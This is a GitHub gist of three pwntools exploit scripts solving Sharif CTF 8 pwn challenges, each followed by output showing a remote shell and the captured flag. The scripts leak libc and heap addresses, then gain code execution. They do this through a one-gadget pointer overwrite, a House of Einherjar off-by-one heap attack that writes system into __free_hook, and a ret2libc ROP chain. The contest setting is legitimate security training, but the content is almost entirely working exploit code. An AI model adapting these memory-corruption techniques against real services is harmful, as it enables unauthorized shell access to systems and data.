Last active
February 3, 2018 23:26
-
-
Save 0xacb/7f873d23683e36a037460ed034b87576 to your computer and use it in GitHub Desktop.
Sharif CTF 8 - Pwn 75, 125 and 250
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
''' | |
Have you ever played with this *special* seq holder in Python? | |
nc ctf.sharif.edu 22106 | |
Alternative: nc 213.233.161.38 22106 | |
''' | |
local = False | |
if local: | |
r = process("./server.py") | |
else: | |
r = remote("213.233.161.38", 22106) | |
def menu(): | |
r.recvuntil("Exit") | |
def create_db(id, tag, l): | |
r.sendline("1") | |
r.sendline(str(id)) | |
r.sendline(tag) | |
r.sendline(str(l)) | |
def edit_db(tag, seq=None): | |
r.sendline("2") | |
r.recvuntil("[2] seq") | |
r.sendline("1") | |
r.sendline(tag) | |
def print_db(tag=True): | |
r.sendline("3") | |
r.recvuntil("[2] seq") | |
if tag: | |
r.sendline("1") | |
r.recvuntil("tag: ") | |
else: | |
r.sendline("2") | |
r.recvuntil("seq: ") | |
return r.recvuntil("1.")[:-3] | |
create_db(0, "", 20) | |
menu() | |
leak_s = print_db(tag=False) | |
libc_leak = u64(leak_s.ljust(8, "\x00")) | |
info("libc_leak: %s" % hex(libc_leak)) | |
libc_offset = 0x7fa3043f7b88-0x00007fa304033000 | |
libc_base = libc_leak - libc_offset | |
info("libc_base: %s" % hex(libc_base)) | |
menu() | |
writable_addr = 0x921010 | |
one_shot_shell = libc_base + 0x4526a | |
edit_db("A"*8 + p64(0)+ p64(0) + p64(writable_addr) + p64(20) + p64(one_shot_shell) + p64(0)) # overflow and overwrite db method | |
menu() | |
r.sendline("5") | |
r.interactive() | |
''' | |
[+] Opening connection to 213.233.161.38 on port 22106: Done | |
[*] libc_leak: 0x7f534050bb88 | |
[*] libc_base: 0x7f5340147000 | |
[*] Switching to interactive mode | |
Enter selected menu> $ id | |
uid=1001(suctf) gid=1001(suctf) groups=1001(suctf) | |
$ cat /home/suctf/flag | |
SharifCTF{0N3_M0R3_5T3P_70_**J1T**_H34V3N} | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
''' | |
Someone has designed this top secret management service for us. He was insisting on the term `t00p`. Could you please take a look and find out why? | |
nc ctf.sharif.edu 22107 | |
Alternative: nc 213.233.161.38 22107 | |
''' | |
local = False | |
master_key = "wjigaep;r[jg]ahrg[es9hrg" | |
if local: | |
r = process("./t00p_secrets") | |
else: | |
r = remote("213.233.161.38", 22107) | |
r.recvuntil("Enter your master key: ") | |
r.sendline(master_key) | |
def menu(): | |
return r.recvuntil("> ") | |
def create(idx, size, content, binary=True): | |
r.sendline("1") | |
r.recvuntil("Enter secret idx: ") | |
r.sendline(str(idx)) | |
r.recvuntil("Enter secret body size: ") | |
r.sendline(str(size)) | |
r.recvuntil("String(1): ") | |
if binary: | |
r.sendline("0") | |
else: | |
r.sendline("1") | |
r.recvuntil("):") | |
r.send(content) | |
def edit(idx, content, binary=True): | |
r.sendline("3") | |
r.recvuntil("Please enter secret id to edit: ") | |
r.sendline(str(idx)) | |
r.recvuntil("String(1): ") | |
if binary: | |
r.sendline("0") | |
else: | |
r.sendline("1") | |
r.recvuntil("content: ") | |
r.send(content) | |
def delete(idx): | |
r.sendline("2") | |
r.recvuntil("to delete: ") | |
r.sendline(str(idx)) | |
def print_secret(idx): | |
r.sendline("5") | |
r.recvuntil("Please enter secret id to print: ") | |
r.sendline(str(idx)) | |
s = r.recvuntil("1.")[:-3] | |
if "No such secret!" in s: | |
return "" | |
index = s.find("content: ")+9 | |
return s[index:s.find("\n",index)] | |
def change_master(master_key): | |
r.sendline("7") | |
r.recvuntil("Enter your master key: ") | |
r.send(master_key) | |
r.recvuntil("Enter your master key: ") | |
r.send(master_key) | |
menu() | |
# leak libc address: | |
create(0, 128, "A"*4) | |
menu() | |
create(1, 128, "B"*4) | |
menu() | |
create(2, 128, "C"*4) | |
menu() | |
delete(1) | |
menu() | |
create(1, 128, "A"*8) | |
menu() | |
s = print_secret(1) | |
libc_address = u64(s[8:16]) | |
info("libc leak: %s" % hex(libc_address)) | |
libc_offset = 0x3c4b78 | |
libc_base = libc_address-libc_offset | |
info("libc base: %s" % hex(libc_base)) | |
# clean up | |
delete(0) | |
menu() | |
delete(1) | |
menu() | |
delete(2) | |
menu() | |
# heap leak | |
create(0, 16, "A"*4) | |
menu() | |
create(1, 16, "B"*4) | |
menu() | |
create(2, 16, "C"*4) | |
menu() | |
delete(1) | |
menu() | |
delete(0) | |
menu() | |
create(0, 8, "\x30") | |
menu() | |
s = print_secret(0) | |
heap_address = u64(s[0:8].ljust(8, "\x00")) | |
info("heap leak: %s" % hex(heap_address)) | |
heap_base = heap_address-0x30 | |
info("heap_base: %s" % hex(heap_base)) | |
# clean up | |
delete(2) | |
menu() | |
delete(0) | |
menu() | |
# house of einherjar | |
create(7, 0x100, "e") # size | |
menu() | |
create(4, 40, "a"*10) | |
menu() | |
create(5, 0xf8, "b"*10) | |
menu() | |
edit(4, "a"*40, False) # OBO | |
menu() | |
target = 0x602098 | |
evil_prev_size = (heap_base + 0x1b0)-(target) | |
info("prev_size: %s" % hex(evil_prev_size)) | |
edit(4, "a"*0x20 + p64(evil_prev_size), True) | |
menu() | |
new_master = p64(evil_prev_size) + p64(target) + p64(target) | |
change_master(new_master) | |
delete(5) | |
menu() | |
free_hook = libc_base + 0x3c67a8 | |
system = libc_base + 0x45390 | |
info("free_hook: %s" % hex(free_hook)) | |
info("system: %s" % hex(system)) | |
# write system to free_hook | |
create(5, 512, "/bin/sh\x00".ljust((8*6), "\x00") + p64(free_hook)) | |
menu() | |
edit(4, p64(system)) | |
menu() | |
delete(5) | |
r.interactive() | |
''' | |
[+] Opening connection to 213.233.161.38 on port 22107: Done | |
[*] libc leak: 0x7f7d4e8fcb78 | |
[*] libc base: 0x7f7d4e538000 | |
[*] heap leak: 0x237d030 | |
[*] heap_base: 0x237d000 | |
[*] prev_size: 0x1d7b118 | |
[*] free_hook: 0x7f7d4e8fe7a8 | |
[*] system: 0x7f7d4e57d390 | |
[*] Switching to interactive mode | |
$ id | |
uid=1001(suctf) gid=1001(suctf) groups=1001(suctf) | |
$ cat /home/suctf/flag | |
SharifCTF{R34V1L1NG_S3CR3T5_VI4_51NGL3_NULL_BY73} | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
''' | |
It all started with a leak bang | |
nc ctf.sharif.edu 4801 | |
Alternative: nc 213.233.161.38 4801 | |
''' | |
local = False | |
if local: | |
r = process("./vuln4") | |
else: | |
r = remote("213.233.161.38", 4801) | |
# leak puts address | |
puts_got = 0x8049874 | |
puts_plt = 0x80483A0 | |
main = 0x80484EA | |
r.recvuntil("yourself\n") | |
payload = "A"*22 + p32(puts_plt) + p32(main) + p32(puts_got) # return to main | |
r.sendline(payload) | |
s = r.recvuntil("This")[:-5] | |
puts_libc = u32(s[0:4]) | |
info("puts_libc = %s" % hex(puts_libc)) | |
r.recvuntil("yourself\n") | |
# system("/bin/sh") | |
system_offset = 0x565b4ca0-0x5658fda0 | |
bin_sh_offset = 0x566b0a0b-0x565b4ca0 | |
system_libc = puts_libc - system_offset | |
bin_sh = puts_libc + bin_sh_offset | |
info("system_libc = %s" % hex(system_libc)) | |
info("bin_sh = %s" % hex(bin_sh)) | |
payload = "A"*22 + p32(system_libc) + p32(main) + p32(bin_sh) | |
r.sendline(payload) | |
r.interactive() | |
''' | |
[*] puts_libc = 0xb75cbca0 | |
[*] system_libc = 0xb75a6da0 | |
[*] bin_sh = 0xb76c7a0b | |
[*] Switching to interactive mode | |
$ id | |
uid=1002(ctfuser) gid=1002(ctfuser) groups=1002(ctfuser) | |
$ cat /home/ctfuser/flag | |
SharifCTF{7af9dab81dff481772609b97492d6899} | |
''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment